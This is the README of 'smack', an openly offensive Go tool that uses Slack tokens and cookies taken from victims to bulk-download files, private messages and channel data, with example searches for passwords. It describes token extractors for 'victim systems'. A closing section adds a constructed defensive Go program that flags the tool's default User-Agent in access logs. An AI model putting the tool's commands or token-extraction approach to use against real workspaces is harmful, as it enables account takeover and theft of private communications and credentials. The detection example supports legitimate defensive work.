⚠ WARNING: Experimental ⚠
A tool to use the non-public Slack user interaction API to do evil. Current / planned capabilities are as follows:
Some important sub-features planned:
git clone git.sr.ht/~poptart/smack
cd "${GOPATH}/src/git.sr.ht/~poptart/smack/cmd/smack"
go build smack.go
or
go get git.sr.ht/~poptart/smack
usage: ./smack command [-vh] [-a user_agent] [-t token]
       [-x x_cookie] [-u subdomain] [-c json_config] [command specific flags]

Globally used flags:
  -h: Print help and exit
  -v: Verbose
  -a user_agent: User-Agent string defaults to
                 ("Mozilla/5.0 (Windows NT 10.0; Win64; x64)
                 AppleWebKit/537.36 (KHTML, like Gecko)
                 Chrome/73.0.3683.103 Safari/537.36")
  -t token: Slack token to use for interactions, this is from
            localStorage. Often in the format of "xoxp-*"
  -x x_cookie: User authentication cookie from cookie storage
  -u subdomain: The subdomain for authentication i.e.: "metasploit"
                will refer to "metasploit.slack.com"
  -c json_config: Read configuration from json, an example can be seen
                  in the source "examples/config.json". Flags should
                  override settings in configuration.

Command specific flags:
  emoji: Retrieves information about emojis
    -o: output file
    -s: per user stats
  files: Retrieves all files on a Slack server
    -n: Do not download the documents only retrieve their information
    -q query: query is used for Slack search. Currently all built in
              Slack filters for text are supported, and common
              type:filters are updated in the api.go file. Useful
              ones are 'type:all', 'type:zip', 'type:pdf'.
    -f filter: Files that content-type match filter will be selected.
               This is most useful with '-q type:all' to filter for
               files that Slack does not directly support for
               filtering. Example: -f "application/pdf"
    -o output: Where to output downloaded files to, this is expected
               to be a directory
  messages: Retrieves messages from a Slack server
    -q query: query is used for Slack search. Currently all built in
              Slack filters for text are supported
    -p: retrieve messages "to" and "from" the user, aka private
        messages
    -o outfile: write the messages to 'outfile'
    -i convid: retrieve messages from a conversation id (from channel
               or conversation). Add -l option to limit the returned
               results.
    -l limit: only return "limit" number of responses. Must be an
              integer
  channels: List all channels or channel information
    -q query: query for a list of channels matching this string
    -o outfile: write channels to file
    -p: search for only private channels
    -i convid: retrieve information about a specific channel by id
  check: List information and check configuration
    -o outfile: write channels to file
    -q: do not output anything except errors, useful for quick checks
Subcommands:
examples/config.json as a template (NOTE: some APIs might need different arguments. Generally URL, Token, and B cookie are needed)
./smack check -c examples/fakeserver.json
./smack files -c examples/fakeserver.json -q "type:zip" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:zip password" -o /tmp/
./smack files -c examples/fakeserver.json -q "type:all" -f "text/plain" -o /tmp/
./smack messages -c examples/fakeserver.json -q "wifi password"
./smack messages -c examples/fakeserver.json -p
./smack channels -c examples/fakeserver.json
./smack channels -c examples/fakeserver.json -p -q "devops"
The smack project also attempts to maintain a way to extract the Slack tokens from victim systems. It additionally attempts to have functionality for many types of systems and many different methods for extractions. The following list of extractors is either in the works or exists:
cmd/extractors/linux/extract.sh
- Runs a bunch of strings on leveldb to extract tokens
cmd/extractors/win/cs/
- (PLANNED)
cmd/extractors/win/go/
- (PLANNED)
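
For defenders reviewing workspace access logs, the default `-a` User-Agent listed under the global flags is a cheap first indicator, though it only catches runs that did not override `-a`. The Go program below is an added example, not part of smack: the log field names and sample records are constructed, and it assumes the default string is the three wrapped usage lines joined by single spaces.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// smackDefaultUA is the default -a value from the usage text (assumed joined by single spaces).
const smackDefaultUA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " +
	"AppleWebKit/537.36 (KHTML, like Gecko) " +
	"Chrome/73.0.3683.103 Safari/537.36"

// login is one access-log record; the field names are assumptions for this example.
type login struct {
	User      string `json:"username"`
	IP        string `json:"ip"`
	UserAgent string `json:"user_agent"`
}

// sampleLog is constructed data (documentation IP ranges), one JSON object per line.
const sampleLog = `{"username":"alice","ip":"198.51.100.7","user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"}
{"username":"alice","ip":"203.0.113.44","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"}
{"username":"bob","ip":"198.51.100.9","user_agent":"Slack/4.36 (Electron)"}
not-json line that should be skipped
{"username":"carol","ip":"203.0.113.44","user_agent":"Mozilla/5.0  (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"}`

// flagDefaultUA returns a sorted "user@ip" entry for every record using the default UA.
func flagDefaultUA(log string) []string {
	var hits []string
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		var l login
		if json.Unmarshal(sc.Bytes(), &l) != nil {
			continue // skip malformed lines instead of aborting the hunt
		}
		// Collapse whitespace runs so padded or re-wrapped UA strings still match.
		if strings.Join(strings.Fields(l.UserAgent), " ") == smackDefaultUA {
			hits = append(hits, l.User+"@"+l.IP)
		}
	}
	sort.Strings(hits)
	return hits
}

func main() {
	fmt.Println("default smack User-Agent seen:", flagDefaultUA(sampleLog))
}
```

Two accounts hitting the same source IP with this exact Chrome 73 string, as in the constructed sample, is a stronger signal than a single match, since the string is also a legitimate (if long outdated) browser User-Agent.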